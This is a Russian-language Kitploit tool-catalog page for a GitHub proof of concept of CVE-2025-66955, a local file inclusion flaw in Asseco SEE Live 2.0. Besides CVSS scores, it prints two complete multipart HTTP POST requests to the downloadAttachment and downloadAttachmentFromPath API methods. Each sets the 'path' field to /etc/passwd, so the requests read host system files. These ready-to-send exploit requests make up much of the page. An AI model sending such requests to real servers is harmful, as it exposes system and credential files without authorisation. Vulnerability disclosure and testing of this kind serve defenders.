Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-66955 — Локальное включение файлов в компонентах Contact Plan, E-Mail, SMS и Fax в Asseco SEE Live 2.0 позволяет удаленным аутентифицированным пользователям получать доступ к файлам на хосте через параметр "path" в вызовах API downloadAttachment и downloadAttachmentFromPath. | Kitploit
Инструменты/GitHubGitHub/thewoodenbench/cve-2025-66955
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubthewoodenbench/cve-2025-66955

CVE-2025-66955

Локальное включение файлов в компонентах Contact Plan, E-Mail, SMS и Fax в Asseco SEE Live 2.0 позволяет удаленным аутентифицированным пользователям получать доступ к файлам на хосте через параметр "path" в вызовах API downloadAttachment и downloadAttachmentFromPath.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
8 месяцев назадЕщё не проверено

CVE-2025-66955

Локальное включение файлов (LFI) в компонентах Contact Plan, E-Mail, SMS и Fax в Asseco SEE Live 2.0 позволяет удаленным аутентифицированным пользователям получать доступ к файлам на хосте через параметр "path" в API-вызовах downloadAttachment и downloadAttachmentFromPath.

Векторы CVSS

  • CVSS 3.1: 7.7, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CVSS 4.0: 8.4, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N

Векторы атаки

HTTP-запросы требуют низкой аутентификации.

downloadAttachment

root@kitploit:~
POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"

HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"

Email.downloadAttachment
------WebKitFormBoundary
Content-Disposition: form-data; name="id"

[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="path"

/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"

[REDACTED]
------WebKitFormBoundary--

downloadAttachmentFromPath

root@kitploit:~
POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"

HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"

Email.downloadAttachmentFromPath
------WebKitFormBoundary
Content-Disposition: form-data; name="path"

/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"

[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="model"

Template
------WebKitFormBoundary--

Скачать инструмент